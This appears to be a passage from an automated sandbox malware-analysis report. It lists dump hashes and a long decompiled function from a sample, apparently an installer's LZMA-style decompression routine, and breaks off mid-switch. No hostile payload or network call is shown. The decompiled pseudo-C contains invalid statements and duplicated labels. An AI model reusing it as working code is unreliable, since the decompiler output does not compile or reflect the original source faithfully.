                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 23d90c1db76db7edd9cc4d8a45db571517f104fb6d742d4438539565e12cc062
                                                          • Instruction ID: ded64b1a4db59f6dff1a94f5a9d162ff15a4dde6347ba0f82720ffa54b61a1b0
                                                          • Opcode Fuzzy Hash: 23d90c1db76db7edd9cc4d8a45db571517f104fb6d742d4438539565e12cc062
                                                          • Instruction Fuzzy Hash: 09711371D00229CFDF28CF98C844BADBBB1FB44305F25816AD856BB281D7789A96DF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E00406440() {
                                                          				unsigned short _t531;
                                                          				signed int _t532;
                                                          				void _t533;
                                                          				signed int _t534;
                                                          				signed int _t535;
                                                          				signed int _t565;
                                                          				signed int _t568;
                                                          				signed int _t589;
                                                          				signed int* _t606;
                                                          				void* _t613;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					if( *(_t613 - 0x40) != 0) {
                                                          						 *(_t613 - 0x84) = 0xb;
                                                          						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                          						goto L132;
                                                          					} else {
                                                          						__eax =  *(__ebp - 0x28);
                                                          						L88:
                                                          						 *(__ebp - 0x2c) = __eax;
                                                          						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          						L89:
                                                          						__eax =  *(__ebp - 4);
                                                          						 *(__ebp - 0x80) = 0x15;
                                                          						__eax =  *(__ebp - 4) + 0xa68;
                                                          						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                          						L69:
                                                          						 *(__ebp - 0x84) = 0x12;
                                                          						while(1) {
                                                          							L132:
                                                          							 *(_t613 - 0x54) = _t606;
                                                          							while(1) {
                                                          								L133:
                                                          								_t531 =  *_t606;
                                                          								_t589 = _t531 & 0x0000ffff;
                                                          								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                          								if( *(_t613 - 0xc) >= _t565) {
                                                          									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                          									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                          									 *(_t613 - 0x40) = 1;
                                                          									_t532 = _t531 - (_t531 >> 5);
                                                          									 *_t606 = _t532;
                                                          								} else {
                                                          									 *(_t613 - 0x10) = _t565;
                                                          									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                          								}
                                                          								if( *(_t613 - 0x10) >= 0x1000000) {
                                                          									goto L139;
                                                          								}
                                                          								L137:
                                                          								if( *(_t613 - 0x6c) == 0) {
                                                          									 *(_t613 - 0x88) = 5;
                                                          									L170:
                                                          									_t568 = 0x22;
                                                          									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                          									_t535 = 0;
                                                          									L172:
                                                          									return _t535;
                                                          								}
                                                          								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                          								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                          								L139:
                                                          								_t533 =  *(_t613 - 0x84);
                                                          								while(1) {
                                                          									 *(_t613 - 0x88) = _t533;
                                                          									while(1) {
                                                          										L1:
                                                          										_t534 =  *(_t613 - 0x88);
                                                          										if(_t534 > 0x1c) {
                                                          											break;
                                                          										}
                                                          										switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
                                                          											case 0:
                                                          												if( *(_t613 - 0x6c) == 0) {
                                                          													goto L170;
                                                          												}
                                                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          												_t534 =  *( *(_t613 - 0x70));
                                                          												if(_t534 > 0xe1) {
                                                          													goto L171;
                                                          												}
                                                          												_t538 = _t534 & 0x000000ff;
                                                          												_push(0x2d);
                                                          												asm("cdq");
                                                          												_pop(_t570);
                                                          												_push(9);
                                                          												_pop(_t571);
                                                          												_t609 = _t538 / _t570;
                                                          												_t540 = _t538 % _t570 & 0x000000ff;
                                                          												asm("cdq");
                                                          												_t604 = _t540 % _t571 & 0x000000ff;
                                                          												 *(_t613 - 0x3c) = _t604;
                                                          												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                          												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                          												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                          												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                          													L10:
                                                          													if(_t612 == 0) {
                                                          														L12:
                                                          														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                          														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          														goto L15;
                                                          													} else {
                                                          														goto L11;
                                                          													}
                                                          													do {
                                                          														L11:
                                                          														_t612 = _t612 - 1;
                                                          														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                          													} while (_t612 != 0);
                                                          													goto L12;
                                                          												}
                                                          												if( *(_t613 - 4) != 0) {
                                                          													GlobalFree( *(_t613 - 4));
                                                          												}
                                                          												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                          												 *(_t613 - 4) = _t534;
                                                          												if(_t534 == 0) {
                                                          													goto L171;
                                                          												} else {
                                                          													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                          													goto L10;
                                                          												}
                                                          											case 1:
                                                          												L13:
                                                          												__eflags =  *(_t613 - 0x6c);
                                                          												if( *(_t613 - 0x6c) == 0) {
                                                          													 *(_t613 - 0x88) = 1;
                                                          													goto L170;
                                                          												}
                                                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                          												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          												_t45 = _t613 - 0x48;
                                                          												 *_t45 =  *(_t613 - 0x48) + 1;
                                                          												__eflags =  *_t45;
                                                          												L15:
                                                          												if( *(_t613 - 0x48) < 4) {
                                                          													goto L13;
                                                          												}
                                                          												_t546 =  *(_t613 - 0x40);
                                                          												if(_t546 ==  *(_t613 - 0x74)) {
                                                          													L20:
                                                          													 *(_t613 - 0x48) = 5;
                                                          													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                          													goto L23;
                                                          												}
                                                          												 *(_t613 - 0x74) = _t546;
                                                          												if( *(_t613 - 8) != 0) {
                                                          													GlobalFree( *(_t613 - 8));
                                                          												}
                                                          												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                          												 *(_t613 - 8) = _t534;
                                                          												if(_t534 == 0) {
                                                          													goto L171;
                                                          												} else {
                                                          													goto L20;
                                                          												}
                                                          											case 2:
                                                          												L24:
                                                          												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                          												 *(_t613 - 0x84) = 6;
                                                          												 *(_t613 - 0x4c) = _t553;
                                                          												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                          												L132:
                                                          												 *(_t613 - 0x54) = _t606;
                                                          												goto L133;
                                                          											case 3:
                                                          												L21:
                                                          												__eflags =  *(_t613 - 0x6c);
                                                          												if( *(_t613 - 0x6c) == 0) {
                                                          													 *(_t613 - 0x88) = 3;
                                                          													goto L170;
                                                          												}
                                                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          												_t67 = _t613 - 0x70;
                                                          												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                          												__eflags =  *_t67;
                                                          												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                          												L23:
                                                          												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                          												if( *(_t613 - 0x48) != 0) {
                                                          													goto L21;
                                                          												}
                                                          												goto L24;
                                                          											case 4:
                                                          												L133:
                                                          												_t531 =  *_t606;
                                                          												_t589 = _t531 & 0x0000ffff;
                                                          												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                          												if( *(_t613 - 0xc) >= _t565) {
                                                          													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                          													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                          													 *(_t613 - 0x40) = 1;
                                                          													_t532 = _t531 - (_t531 >> 5);
                                                          													 *_t606 = _t532;
                                                          												} else {
                                                          													 *(_t613 - 0x10) = _t565;
                                                          													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                          												}
                                                          												if( *(_t613 - 0x10) >= 0x1000000) {
                                                          													goto L139;
                                                          												}
                                                          											case 5:
                                                          												goto L137;
                                                          											case 6:
                                                          												__edx = 0;
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 4);
                                                          													__ecx =  *(__ebp - 0x38);
                                                          													 *(__ebp - 0x34) = 1;
                                                          													 *(__ebp - 0x84) = 7;
                                                          													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                          													while(1) {
                                                          														L132:
                                                          														 *(_t613 - 0x54) = _t606;
                                                          														goto L133;
                                                          													}
                                                          												}
                                                          												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          												__esi =  *(__ebp - 0x60);
                                                          												__cl = 8;
                                                          												__cl = 8 -  *(__ebp - 0x3c);
                                                          												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          												__ecx =  *(__ebp - 0x3c);
                                                          												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          												__ecx =  *(__ebp - 4);
                                                          												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          												__eflags =  *(__ebp - 0x38) - 4;
                                                          												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          												if( *(__ebp - 0x38) >= 4) {
                                                          													__eflags =  *(__ebp - 0x38) - 0xa;
                                                          													if( *(__ebp - 0x38) >= 0xa) {
                                                          														_t98 = __ebp - 0x38;
                                                          														 *_t98 =  *(__ebp - 0x38) - 6;
                                                          														__eflags =  *_t98;
                                                          													} else {
                                                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          													}
                                                          												} else {
                                                          													 *(__ebp - 0x38) = 0;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x34) - __edx;
                                                          												if( *(__ebp - 0x34) == __edx) {
                                                          													__ebx = 0;
                                                          													__ebx = 1;
                                                          													goto L61;
                                                          												} else {
                                                          													__eax =  *(__ebp - 0x14);
                                                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          													__eflags = __eax -  *(__ebp - 0x74);
                                                          													if(__eax >=  *(__ebp - 0x74)) {
                                                          														__eax = __eax +  *(__ebp - 0x74);
                                                          														__eflags = __eax;
                                                          													}
                                                          													__ecx =  *(__ebp - 8);
                                                          													__ebx = 0;
                                                          													__ebx = 1;
                                                          													__al =  *((intOrPtr*)(__eax + __ecx));
                                                          													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          													goto L41;
                                                          												}
                                                          											case 7:
                                                          												__eflags =  *(__ebp - 0x40) - 1;
                                                          												if( *(__ebp - 0x40) != 1) {
                                                          													__eax =  *(__ebp - 0x24);
                                                          													 *(__ebp - 0x80) = 0x16;
                                                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          													__eax =  *(__ebp - 0x28);
                                                          													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          													__eax =  *(__ebp - 0x2c);
                                                          													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          													__eax = 0;
                                                          													__eflags =  *(__ebp - 0x38) - 7;
                                                          													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          													__al = __al & 0x000000fd;
                                                          													__eax = (__eflags >= 0) - 1 + 0xa;
                                                          													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                          													__eax =  *(__ebp - 4);
                                                          													__eax =  *(__ebp - 4) + 0x664;
                                                          													__eflags = __eax;
                                                          													 *(__ebp - 0x58) = __eax;
                                                          													goto L69;
                                                          												}
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x84) = 8;
                                                          												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                          												while(1) {
                                                          													L132:
                                                          													 *(_t613 - 0x54) = _t606;
                                                          													goto L133;
                                                          												}
                                                          											case 8:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 4);
                                                          													__ecx =  *(__ebp - 0x38);
                                                          													 *(__ebp - 0x84) = 0xa;
                                                          													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                          												} else {
                                                          													__eax =  *(__ebp - 0x38);
                                                          													__ecx =  *(__ebp - 4);
                                                          													__eax =  *(__ebp - 0x38) + 0xf;
                                                          													 *(__ebp - 0x84) = 9;
                                                          													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                          												}
                                                          												while(1) {
                                                          													L132:
                                                          													 *(_t613 - 0x54) = _t606;
                                                          													goto L133;
                                                          												}
                                                          											case 9:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													goto L89;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x60);
                                                          												if( *(__ebp - 0x60) == 0) {
                                                          													goto L171;
                                                          												}
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                          												__eflags = _t259;
                                                          												0 | _t259 = _t259 + _t259 + 9;
                                                          												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                          												goto L76;
                                                          											case 0xa:
                                                          												goto L0;
                                                          											case 0xb:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__ecx =  *(__ebp - 0x24);
                                                          													__eax =  *(__ebp - 0x20);
                                                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          												} else {
                                                          													__eax =  *(__ebp - 0x24);
                                                          												}
                                                          												__ecx =  *(__ebp - 0x28);
                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          												goto L88;
                                                          											case 0xc:
                                                          												L99:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xc;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t334 = __ebp - 0x70;
                                                          												 *_t334 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t334;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												goto L101;
                                                          											case 0xd:
                                                          												L37:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xd;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t122 = __ebp - 0x70;
                                                          												 *_t122 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t122;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												L39:
                                                          												__eax =  *(__ebp - 0x40);
                                                          												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          													goto L48;
                                                          												}
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													goto L54;
                                                          												}
                                                          												L41:
                                                          												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          												__ecx =  *(__ebp - 0x58);
                                                          												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          												 *(__ebp - 0x48) = __eax;
                                                          												__eax = __eax + 1;
                                                          												__eax = __eax << 8;
                                                          												__eax = __eax + __ebx;
                                                          												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edx = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													 *(__ebp - 0x40) = 1;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													__ebx = __ebx + __ebx + 1;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edx;
                                                          													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													goto L39;
                                                          												} else {
                                                          													goto L37;
                                                          												}
                                                          											case 0xe:
                                                          												L46:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xe;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t156 = __ebp - 0x70;
                                                          												 *_t156 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t156;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												while(1) {
                                                          													L48:
                                                          													__eflags = __ebx - 0x100;
                                                          													if(__ebx >= 0x100) {
                                                          														break;
                                                          													}
                                                          													__eax =  *(__ebp - 0x58);
                                                          													__edx = __ebx + __ebx;
                                                          													__ecx =  *(__ebp - 0x10);
                                                          													__esi = __edx + __eax;
                                                          													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          													__ax =  *__esi;
                                                          													 *(__ebp - 0x54) = __esi;
                                                          													__edi = __ax & 0x0000ffff;
                                                          													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          													__eflags =  *(__ebp - 0xc) - __ecx;
                                                          													if( *(__ebp - 0xc) >= __ecx) {
                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          														__cx = __ax;
                                                          														_t170 = __edx + 1; // 0x1
                                                          														__ebx = _t170;
                                                          														__cx = __ax >> 5;
                                                          														__eflags = __eax;
                                                          														 *__esi = __ax;
                                                          													} else {
                                                          														 *(__ebp - 0x10) = __ecx;
                                                          														0x800 = 0x800 - __edi;
                                                          														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          														__ebx = __ebx + __ebx;
                                                          														 *__esi = __cx;
                                                          													}
                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                          														continue;
                                                          													} else {
                                                          														goto L46;
                                                          													}
                                                          												}
                                                          												L54:
                                                          												_t173 = __ebp - 0x34;
                                                          												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                          												__eflags =  *_t173;
                                                          												goto L55;
                                                          											case 0xf:
                                                          												L58:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xf;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t203 = __ebp - 0x70;
                                                          												 *_t203 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t203;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												L60:
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													L55:
                                                          													__al =  *(__ebp - 0x44);
                                                          													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          													goto L56;
                                                          												}
                                                          												L61:
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__edx = __ebx + __ebx;
                                                          												__ecx =  *(__ebp - 0x10);
                                                          												__esi = __edx + __eax;
                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													_t217 = __edx + 1; // 0x1
                                                          													__ebx = _t217;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													goto L60;
                                                          												} else {
                                                          													goto L58;
                                                          												}
                                                          											case 0x10:
                                                          												L109:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0x10;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t365 = __ebp - 0x70;
                                                          												 *_t365 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t365;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												goto L111;
                                                          											case 0x11:
                                                          												goto L69;
                                                          											case 0x12:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 0x58);
                                                          													 *(__ebp - 0x84) = 0x13;
                                                          													__esi =  *(__ebp - 0x58) + 2;
                                                          													while(1) {
                                                          														L132:
                                                          														 *(_t613 - 0x54) = _t606;
                                                          														goto L133;
                                                          													}
                                                          												}
                                                          												__eax =  *(__ebp - 0x4c);
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          												__ecx =  *(__ebp - 0x58);
                                                          												__eax =  *(__ebp - 0x4c) << 4;
                                                          												__eflags = __eax;
                                                          												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          												goto L130;
                                                          											case 0x13:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													_t469 = __ebp - 0x58;
                                                          													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          													__eflags =  *_t469;
                                                          													 *(__ebp - 0x30) = 0x10;
                                                          													 *(__ebp - 0x40) = 8;
                                                          													L144:
                                                          													 *(__ebp - 0x7c) = 0x14;
                                                          													goto L145;
                                                          												}
                                                          												__eax =  *(__ebp - 0x4c);
                                                          												__ecx =  *(__ebp - 0x58);
                                                          												__eax =  *(__ebp - 0x4c) << 4;
                                                          												 *(__ebp - 0x30) = 8;
                                                          												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          												L130:
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												 *(__ebp - 0x40) = 3;
                                                          												goto L144;
                                                          											case 0x14:
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          												__eax =  *(__ebp - 0x80);
                                                          												 *(_t613 - 0x88) = _t533;
                                                          												goto L1;
                                                          											case 0x15:
                                                          												__eax = 0;
